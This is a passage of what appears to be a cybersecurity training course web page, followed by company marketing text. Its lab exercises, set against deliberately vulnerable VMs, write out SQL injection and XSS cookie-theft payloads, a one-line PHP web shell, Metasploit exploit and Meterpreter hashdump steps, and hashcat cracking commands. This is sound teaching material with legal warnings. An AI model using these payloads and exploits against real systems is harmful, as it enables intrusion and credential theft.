Download Metasploitable2 — search "Metasploitable2 SourceForge" and download the .zip. Extract it. In VirtualBox: Machine → Add → select the .vmdk file.
Configure networking — set BOTH VMs to Host-Only Adapter in VirtualBox settings. This creates an isolated network where they can talk to each other but NOT reach the internet. Critical for safety.
Start Metasploitable2 — login with msfadmin / msfadmin. Run ifconfig to find its IP address (typically 192.168.56.x).
Start Kali Linux — default credentials: kali / kali. Open a terminal. Ping the Metasploitable IP to verify connectivity: ping 192.168.56.101
Run your first Nmap scan — from Kali terminal:

first scan

nmap -sV 192.168.56.101
# You should see 20+ open ports — vsftpd, Apache, MySQL, SSH etc.
# Metasploitable is intentionally vulnerable — every open service is a lab target

✅

Lab complete when...

You can ping Metasploitable from Kali, and Nmap returns a list of open ports and services. Save the Nmap output — you'll refer to it in Labs 2 and 5.

Practical Labs

🔍

Lab 2 — Network Scanning with NmapBeginner

Master Nmap to enumerate hosts, discover services, detect OS versions and identify vulnerabilities. Core skill tested in CompTIA Security+ PBQs.

NmapKali LinuxMetasploitable2

Host discovery — find all live hosts on your lab network:
```
nmap -sn 192.168.56.0/24
```

Stealth SYN scan — fastest, most common scan type:

nmap -sS -p 1-65535 192.168.56.101
# -sS = SYN scan (half-open, less likely to be logged)
# -p 1-65535 = all ports (default only scans top 1000)

Version + OS detection:

nmap -sV -O 192.168.56.101
# Look for: vsftpd 2.3.4 (backdoor vulnerability!)
#           Apache 2.2.8 (old version, many CVEs)
#           OpenSSH 4.7p1 (outdated)

Vulnerability scripts:

nmap --script vuln 192.168.56.101
# Nmap will run vulnerability detection scripts
# Note any CVEs reported — you'll exploit them in Lab 5

Save output to file for your report:

nmap -A -oN metasploitable_scan.txt 192.168.56.101
# -A = aggressive (OS, version, scripts, traceroute)
# -oN = save in normal format to file

⚠️

Legal reminder

Only scan systems you own or have explicit written permission to scan. Scanning without authorisation is illegal in most jurisdictions. Always work within your lab environment.

Practical Labs

📡

Lab 3 — Packet Analysis with WiresharkIntermediate

Capture and analyse live network traffic. Detect cleartext credentials, identify ARP spoofing indicators, and reconstruct TCP sessions.

WiresharkKali Linux

Launch Wireshark on Kali: wireshark & — Select your lab network interface (eth0 or similar). Click the blue shark fin to start capturing.
Capture Telnet credentials — from Kali, telnet to Metasploitable: telnet 192.168.56.101. Login with msfadmin/msfadmin. In Wireshark, filter: telnet — you'll see the username and password in cleartext. This demonstrates why Telnet is dangerous.
Find HTTP credentials — Metasploitable runs a web app on port 80. Browse to it from Kali: http://192.168.56.101/dvwa. Filter Wireshark: http.request.method == "POST" — find the login POST and expand to see cleartext credentials.
Detect ARP traffic — filter: arp. Look for gratuitous ARP replies (same sender/target IP) — these can indicate ARP spoofing. Note the MAC-to-IP mappings.
Follow a TCP stream — right-click any TCP packet → Follow → TCP Stream. This reconstructs the entire conversation. Use this to see full HTTP requests/responses.
Export objects — File → Export Objects → HTTP. Wireshark will list all files transferred over HTTP. This shows how an attacker can recover files from captured traffic.

💡

Key Wireshark filters to memorise

http | tcp | udp | dns | arp | ip.addr == 192.168.1.1 | tcp.port == 443 | http.request.method == "POST"

Practical Labs

🌐

Lab 4 — Web App Attacks (DVWA)Intermediate

Exploit OWASP Top 10 vulnerabilities hands-on using Damn Vulnerable Web Application. Practise SQL injection, XSS, file upload bypass and CSRF.

DVWABurp SuiteSQLmapBrowser

Access DVWA — open browser on Kali and navigate to http://192.168.56.101/dvwa. Login: admin / password. Go to DVWA Security → set to "Low".
SQL Injection — navigate to SQL Injection. In the User ID field enter: ' OR '1'='1 — this should return all users. Then try: ' UNION SELECT user,password FROM users-- - to dump the user table. Observe the results.

SQLmap automation — from Kali terminal:

sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxx;security=low" --dbs
# Replace xxx with your actual session cookie from browser dev tools
# --dbs lists all databases

Stored XSS — navigate to XSS (Stored). In the message field enter: <script>alert(document.cookie)</script> — submit and reload. The script should execute showing your session cookie. This demonstrates cookie theft.
File Upload bypass — navigate to File Upload. Try uploading a .php file. On Low security it should succeed. Create a simple PHP shell: <?php system($_GET['cmd']); ?> saved as shell.php. Upload it and access via browser to execute OS commands.
Burp Suite intercept — set Kali browser proxy to 127.0.0.1:8080. Launch Burp Suite (pre-installed on Kali). Intercept a login request, modify parameters, and observe how request manipulation works.

Practical Labs

💣

Lab 5 — Metasploit ExploitationAdvanced

Exploit a known vulnerability on Metasploitable2, gain a Meterpreter shell, escalate privileges, and extract password hashes.

MetasploitMeterpreterHashcat

Launch Metasploit:

msfconsole
# Wait for it to load (~30 seconds)

Find and use the vsftpd 2.3.4 exploit (backdoor we found with Nmap in Lab 2):

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.56.101
run
# You should get a shell! Type: id — you should see root

Alternatively — Exploit Samba (another Metasploitable vulnerability):

use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1 # Your Kali IP
run

Upgrade to Meterpreter once you have a basic shell:

# In Metasploit — background current session with Ctrl+Z
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
# Now interact with the Meterpreter session:
sessions -i 2

Post-exploitation with Meterpreter:

sysinfo          # System info
getuid           # Current user (should be root)
hashdump         # Extract all password hashes
download /etc/passwd /tmp/  # Download files
ps               # List running processes

Crack the hashes — copy hashes from hashdump output, save to hashes.txt on Kali, then:

hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt
# -m 500 = MD5Crypt (Linux hash type)
# rockyou.txt is the classic wordlist, pre-installed on Kali

⚠️

Legal & ethical reminder

This lab is ONLY to be performed against your own Metasploitable2 VM in an isolated network. Using these techniques against any system without explicit written authorisation is a criminal offence.

Practical Labs

🛡️

Lab 6 — Firewall Configuration (pfSense)Intermediate

Deploy pfSense as a virtual firewall. Create ACL rules, configure a DMZ zone, enable logging, and test your rules by verifying blocked connections.

pfSenseVirtualBoxNmap

Download pfSense from pfsense.org (Community Edition, free). Create a new VM in VirtualBox with 3 network adapters: Adapter 1 = NAT (WAN), Adapter 2 = Host-Only (LAN), Adapter 3 = Host-Only Network 2 (DMZ). Use a separate Host-Only network for DMZ.
Install pfSense — boot from ISO, follow the installer. Assign interfaces when prompted: WAN → em0, LAN → em1, DMZ → em2. Set LAN IP to 192.168.1.1/24 and DMZ IP to 192.168.2.1/24.
Access the web GUI — from Kali (on the LAN segment), browse to https://192.168.1.1. Login: admin/pfsense. Complete the setup wizard.
Create firewall rules — go to Firewall → Rules → DMZ tab. Add rules:
• Allow: DMZ → WAN on ports 80, 443 (web server needs internet access)
• Block: DMZ → LAN (DMZ should never reach internal network)
• Block: LAN → DMZ on ports 22, 3389 (no admin access from LAN to DMZ)
Enable firewall logging — edit each rule and check "Log packets that are handled by this rule." Go to Status → System Logs → Firewall to see live blocked connections.
Test your rules — from a VM in the DMZ, try to ping a LAN device. It should be blocked. Check the firewall log to confirm the block was logged. From Kali (LAN), run: nmap -p 22,3389 [DMZ_IP] — should show filtered.

💡

Real project deliverable

Document your firewall ruleset in a table format: Rule #, Source Zone, Destination Zone, Port/Protocol, Action, Reason. This is the format used in professional security documentation for clients.

Practical Labs

🚨

Lab 7 — Incident Response SimulationAdvanced

Work through a simulated ransomware incident. Practise detection, containment, evidence collection, and write a professional IR report.

SIEM conceptsWiresharkVolatilityWord processor

📋

Scenario

You are a SOC analyst. At 02:14 AM, your SIEM fires an alert: "High volume file rename events — extension .encrypted detected on file server FS-01. 847 files affected in 4 minutes." Work through the IR lifecycle.

Detection & Triage — Determine the priority (P1 — Critical). Identify the affected system (FS-01). Check SIEM for related alerts in the past 24 hours. Look for: unusual login (Event 4624), new process (4688), lateral movement (4648). Document your initial findings.
Containment — Immediate actions:
• Isolate FS-01 from the network (remove from switch or disable NIC)
• Disable the affected user account
• Block the attacker's source IP at the firewall
• Preserve all logs before any changes
Evidence collection — following order of volatility:
• Capture RAM image: winpmem.exe memdump.raw (Windows) or dd if=/dev/mem of=memdump.raw (Linux)
• Record all network connections: netstat -an
• List running processes: tasklist /v or ps aux
• Take disk image with hash verification

Analyse memory with Volatility (if available):

volatility -f memdump.raw --profile=Win10x64 pslist
volatility -f memdump.raw --profile=Win10x64 netscan
volatility -f memdump.raw --profile=Win10x64 malfind
# pslist: running processes
# netscan: network connections at time of capture
# malfind: suspicious injected code in memory

Eradication — Identify and remove ransomware binary. Remove persistence mechanisms (scheduled tasks, registry run keys, new user accounts). Patch the exploited vulnerability.
Write the IR Report — This is your real project deliverable. Include:
- Executive Summary (non-technical, 1 paragraph)
- Incident Timeline (chronological table of events)
- Technical Details (how the attack occurred, what was exploited)
- Indicators of Compromise (IOCs: IPs, file hashes, domain names)
- Impact Assessment (systems/data affected)
- Containment and Eradication actions taken
- Recommendations to prevent recurrence
- Lessons Learned

Practical Labs

🔓

Lab 8 — Password Cracking & DefenceIntermediate

Crack hashed passwords using Hashcat and John the Ripper to understand why password storage and policies matter. Then implement proper password defences.

HashcatJohn the RipperKali Linux

Identify hash types — given a hash, you must identify the type before cracking:

# MD5 example (32 hex chars):
5f4dcc3b5aa765d61d8327deb882cf99  # "password"
# SHA-256 (64 hex chars):
5e884898da2847151d0e56f8dc6292773603dd... # "password"
# Use hashid to identify:
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

Dictionary attack with Hashcat:

# Crack MD5 hash with rockyou wordlist
hashcat -m 0 -a 0 md5_hash.txt /usr/share/wordlists/rockyou.txt

# Crack NTLM (Windows) hashes
hashcat -m 1000 -a 0 ntlm_hash.txt /usr/share/wordlists/rockyou.txt

# Rule-based attack (adds variations)
hashcat -m 0 -a 0 -r /usr/share/hashcat/rules/best64.rule hash.txt rockyou.txt

John the Ripper — alternative cracker, great for auto-detection:

# Auto-detect format and crack
john hash.txt

# With wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# Show cracked passwords
john --show hash.txt

Understand salting — create two identical passwords, one salted, one not. Observe how salting prevents dictionary attacks by making identical passwords produce different hashes.
Password policy exercise — using your cracking results, answer:
• What % of passwords in rockyou.txt were cracked in under 1 minute?
• What password length/complexity makes cracking impractical?
• Write a 1-page password policy recommendation based on your findings

💡

Key insight

The rockyou.txt wordlist contains 14 million real passwords from a 2009 data breach. If an organisation's passwords are in this list, they will be cracked in seconds. This is why "Password123" is catastrophic and why NIST recommends checking passwords against known breach lists.

Final Assessment

Final Exam

50 questions covering all 8 modules. This mirrors the CompTIA Security+ SY0-701 exam format. Passing score: 70% (35/50).

⏱️

Exam conditions

Try to complete this without referring back to the modules. Time yourself — aim to finish in 60 minutes (matching exam pace of ~1 min/question). Review wrong answers after.

Q1

Which attack involves an attacker inserting themselves between two communicating parties to intercept and potentially modify data?

Q2

An organisation needs to calculate the annual cost exposure from a risk. The asset is worth $400,000, the exposure factor is 25%, and the threat occurs once every 4 years. What is the ALE?

Q3

What type of malware opens a persistent backdoor, disguises itself as legitimate software, and does NOT self-replicate?

Q4

Which protocol provides cryptographic authentication of DNS responses to prevent DNS cache poisoning?

Q5

A penetration tester is conducting a black-box test. This means:

Q6

Which of the following is an example of a corrective security control?

Q7

AES-256 is classified as which type of encryption?

Q8

What does RPO represent in disaster recovery planning?

Q9

Which access control model is typically used in military and government environments where data is classified with labels such as "Top Secret" and "Secret"?

Q10

A user receives an email appearing to be from their bank, asking them to verify their account. The email uses the bank's logo but contains a link to a different domain. This is BEST described as:

Q11

Which Nmap flag is used to detect the version of services running on open ports?

Q12

The primary difference between symmetric and asymmetric encryption is:

Q13

A company decides not to implement a security control because the cost of the control ($50,000) exceeds the ALE of the risk ($20,000). This is an example of:

Q14

Which of the following BEST describes the purpose of a Certificate Revocation List (CRL)?

Q15

An attacker gains access to a web server and uses it to attack internal systems that are not accessible from the internet. This technique is called:

Q16

Which GDPR principle requires that personal data be collected only for specified, explicit, and legitimate purposes?

Q17

What is the primary purpose of a SIEM system?

Q18

A security analyst is reviewing logs and sees Windows Event ID 4648 repeatedly for a user account. What does this MOST likely indicate?

Q19

Which backup type backs up only the data that has changed since the last FULL backup?

Q20

An organisation is legally required to retain healthcare records for 7 years and implement specific access controls. Which regulation MOST likely applies?

Q21

What type of scan does Nmap use when the -sS flag is specified?

Q22

Which of the following is NOT a social engineering technique?

Q23

The principle of least privilege requires:

Q24

Which email authentication protocol specifies what should happen to messages that fail SPF or DKIM checks?

Q25

An attacker exploits a buffer overflow to overwrite the return address of a function and redirect execution to malicious code. What security mechanism would MOST directly prevent this?

Q26–50

Continue practising with these additional topics — click "Generate more questions" to get AI-powered questions on any topic you want to review further.

0

questions answered correctly

🎓 Course Complete!

You have completed the XIopt Cybersecurity Practical Experience Course. Your progress includes:

8 learning modules covering all CompTIA Security+ SY0-701 domains
8 hands-on practical labs with real tools (Nmap, Wireshark, Metasploit, pfSense)
Module quizzes + final assessment
Professional deliverables: pentest scan output, IR report, firewall documentation, password policy

Submit your lab deliverables to your XIopt mentor for review and to receive your completion certificate.

Contact Your Mentor →

One Partner.Every Function.Measurable Outcomes.

We Recruit Specialist TalentAcross All 8 Pillars

Outsource, recruit or train — your choice

Finance & Accounting

Technology & Software

Marketing & Growth

Project & Product Mgmt

HR & People Operations

Cybersecurity

Data Science, AI & Machine Learning

Automation

Practical Experience Training

We own the work. End to end.

We own the work.End to end.

We find the talent. You keep the function.

We find the talent.You keep the function.

CPA-Led FinanceThat Drives Decisions

Finance services we deliver for you

IFRS Reporting

FP&A & Forecasting

Tax Planning

Management Accounts

Fractional CFO

Financial Dashboards

We recruit finance professionals screened by a CPA

Finance Training — real projects, job-ready skills

Engineering-GradeSolutions Built to Scale

Technology we build for you

Full-Stack Development

API Integration

AI & Automation

Cloud & DevOps

SaaS & ERP Build

BI Dashboards

Tech talent screened by people who understand the code

Technology Training — real projects, job-ready skills

Growth Marketing ThatGenerates Revenue

Marketing we run for you

Growth Strategy & GTM

SEO & Performance

Social Media & Content

Marketing Automation

Brand Positioning

Growth Analytics

Marketing hires screened by growth practitioners

Marketing Training — real campaigns, job-ready skills

Delivery DisciplineThat Keeps You On Track

PM & Product services we deliver

PMO Setup

Agile Delivery

Product Roadmaps

Risk & Scope Mgmt

Change Management

Fractional PM / PO

PM talent screened by experienced delivery leads

PM & Product Training — real sprints, job-ready skills

HR & RecruitmentAcross All 8 Pillars

HR operations we run for you

HR Policy & Docs

Employment Contracts

Onboarding & Offboarding

Payroll Guidance

Performance Frameworks

HR Ops-as-a-Service

Finance Roles

Technology Roles

Marketing Roles

PM & Product Roles

Cybersecurity Roles

Data & Analytics Roles

HR & People Training — real hiring, job-ready skills

Protect Your BusinessBefore the Threat Finds You

Security services we deliver

Risk Assessment

Policy & Compliance

Threat Monitoring

Cloud Security

Incident Response

vCISO

Security talent that actually understands threats

One Partner.
Every Function.
Measurable Outcomes.

We Recruit Specialist Talent
Across All 8 Pillars

We own the work.
End to end.

We find the talent.
You keep the function.

CPA-Led Finance
That Drives Decisions

Engineering-Grade
Solutions Built to Scale

Growth Marketing That
Generates Revenue

Delivery Discipline
That Keeps You On Track

HR & Recruitment
Across All 8 Pillars

Protect Your Business
Before the Threat Finds You

Data Science, AI &
Machine Learning

Automate the Work.
Scale Without Headcount.

Let's talk about
your goals

One founder.
Two elite designations.
Eight pillars mastered.

Real Training.
Real Projects. Real Results.

One partner for every
enterprise function.

Specialist expertise
without the enterprise price tag.

Move fast.
Stay lean. Get specialist help.

Some ideas reimagine
what already exists.
Others have never been built.

We use the tools we build.
We feel the gaps ourselves.